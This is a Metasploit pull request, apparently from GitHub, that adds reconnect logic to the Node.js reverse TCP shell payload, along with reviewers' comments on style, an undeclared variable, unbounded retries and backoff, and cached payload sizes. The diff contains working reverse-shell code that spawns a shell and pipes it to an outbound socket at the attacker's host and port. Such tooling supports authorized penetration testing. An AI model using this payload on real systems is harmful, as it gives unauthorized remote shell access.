Enhancing the functionality on the nodejs shell_reverse_tcp payload. #9077

Merged
merged 6 commits into from Oct 16, 2017
Changes from 2 commits
26 changes: 16 additions & 10 deletions lib/msf/core/payload/nodejs.rb
@@ -56,16 +56,22 @@ def nodejs_reverse_tcp(opts={})
util = require("util"),
sh = cp.spawn(cmd, []);
var client = this;
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
}
});
function StagerRepeat(){
Contributor

Whitespace and style here is all over the place, note: "Metasploit requires spaces instead of hard tabs"

See https://github.com/rapid7/metasploit-framework/wiki/Style-Tips

I have offered a PR that I believe ends up a bit more readable and replaces the hard tabs. @itsmeroy2012 take a look and merge if you are good with the adjustments. I can complete testing and get this merged soon.

itsmeroy2012#7

client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
}
});
socket.on("error", function(error) {
StagerRepeat();
Contributor

MaxRetries should be taken into account; this will loop ad nauseam.

Contributor Author

The loop runs around 30+ times per second. If a MaxRetry value is specified, it will have to be in the tens of thousands to keep the payload running for just a couple of minutes. @sempervictus

Contributor

This is doing a connect outbound, so at the least a backoff should be added; a MaxRetry could then be set to a reasonable value as well.

Each StagerRepeat() can be called at least a few seconds apart and multiple failures in a row should extend the delay.

Contributor Author

I'm not very well accustomed to the nodejs predefined functions. Is there a similar function like time.sleep() in node as there is in python? @jmartin-r7 @sempervictus

});
}
StagerRepeat();
})();
EOS
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
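Review bot: `socket.on("error", function(error) { StagerRepeat(); });` refers to an identifier `socket` that is never declared in this hunk; the connection is stored as `client.socket` a few lines above, so this should read `client.socket.on("error", ...)`. Unless `socket` exists in a scope outside the hunk, the first call to `StagerRepeat()` throws a ReferenceError right after `net.connect` returns, before any error handler is attached. The handler also calls `StagerRepeat()` synchronously with no delay and no cap, which is the unbounded loop and missing backoff raised in the comments above; a failure counter compared against a MaxRetry value plus a `setTimeout` around the retry would address both points in one change.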
2 changes: 1 addition & 1 deletion modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@@ -10,7 +10,7 @@

module MetasploitModule

CachedSize = 2423
CachedSize = 2823

include Msf::Payload::Single
include Msf::Payload::NodeJS
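Review bot: the CachedSize bump from 2423 to 2823 matches the longer generated script as it stands, but the backoff and MaxRetry handling requested in the review of lib/msf/core/payload/nodejs.rb will change the generated text again, so this value (and the two nodejs/ modules below) will need regenerating with the framework's cached-size tool once that lands; a stale CachedSize is caught by the payload specs.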
2 changes: 1 addition & 1 deletion modules/payloads/singles/nodejs/shell_reverse_tcp.rb
@@ -13,7 +13,7 @@

module MetasploitModule

CachedSize = 601
CachedSize = 701

include Msf::Payload::Single
include Msf::Payload::NodeJS
2 changes: 1 addition & 1 deletion modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@@ -10,7 +10,7 @@

module MetasploitModule

CachedSize = 629
CachedSize = 729

include Msf::Payload::Single
include Msf::Payload::NodeJS